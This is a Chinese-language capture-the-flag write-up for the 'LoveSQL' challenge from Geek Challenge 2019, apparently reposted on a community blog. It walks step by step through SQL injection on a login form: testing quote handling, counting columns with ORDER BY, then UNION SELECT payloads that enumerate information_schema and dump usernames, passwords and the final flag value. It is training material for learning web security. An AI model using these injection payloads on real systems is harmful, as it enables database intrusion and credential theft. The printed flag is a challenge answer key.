[极客大挑战 2019]LoveSQL 1
  rKeEjcARIgc2 2023年12月07日 13 0


题目环境:

[极客大挑战 2019]LoveSQL 1_运维

判断注入类型

是否为数字型注入

admin1

回显结果

[极客大挑战 2019]LoveSQL 1_运维_02

是否为字符型注入

admin1'

回显结果

[极客大挑战 2019]LoveSQL 1_网络安全_03

判断注入手法类型

使用堆叠注入
采用密码参数进行注入

爆数据库

1'; show database();#回显结果

[极客大挑战 2019]LoveSQL 1_web安全_04

这里猜测注入语句某字段被过滤,或者是’;'被过滤导致不能堆叠注入

爆字段数

1';order by 4#回显结果

[极客大挑战 2019]LoveSQL 1_数据库_05

报错
抛弃堆叠注入

步入正题

1' order by 4#回显结果

[极客大挑战 2019]LoveSQL 1_web安全_06

成功,但是不存在第4列
同时验证了猜想不能使用堆叠注入

继续判断列数

1' order by 3#

[极客大挑战 2019]LoveSQL 1_数据库_07

可知列数只有3列

爆数据库

使用联合查询

1' union select 1,2,database()#

[极客大挑战 2019]LoveSQL 1_网络安全_08


爆数据表

1' union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=database()#

回显结果

[极客大挑战 2019]LoveSQL 1_运维_09

爆出两个表
开始爆数据表的字段
按照先后顺序把,先爆第一个

爆geekuser数据表的字段

1' union select 1,database(),group_concat(column_name) from information_schema.columns where table_name='geekuser'#回显结果

[极客大挑战 2019]LoveSQL 1_运维_10

字段:id、username、password

爆geekuser数据表的所有内容

1' union select 1,database(),group_concat(id,username,password) from geekuser#回显结果

[极客大挑战 2019]LoveSQL 1_数据库_11

无flag

转手数据表l0ve1ysq1

步骤和数据表geekuser一样,这里直接爆数据表l0ve1ysq1的flag值

1' union select 1,database(),group_concat(password) from l0ve1ysq1#回显结果

[极客大挑战 2019]LoveSQL 1_运维_12


[极客大挑战 2019]LoveSQL 1_web安全_13


得出flag:

flag{3c4b1ff9-6685-4dcb-853e-06093c1e4040}


【版权声明】本文内容来自摩杜云社区用户原创、第三方投稿、转载,内容版权归原作者所有。本网站的目的在于传递更多信息,不拥有版权,亦不承担相应法律责任。如果您发现本社区中有涉嫌抄袭的内容,欢迎发送邮件进行举报,并提供相关证据,一经查实,本社区将立刻删除涉嫌侵权内容,举报邮箱: cloudbbs@moduyun.com

  1. 分享:
最后一次编辑于 2023年12月07日 0

暂无评论

推荐阅读
rKeEjcARIgc2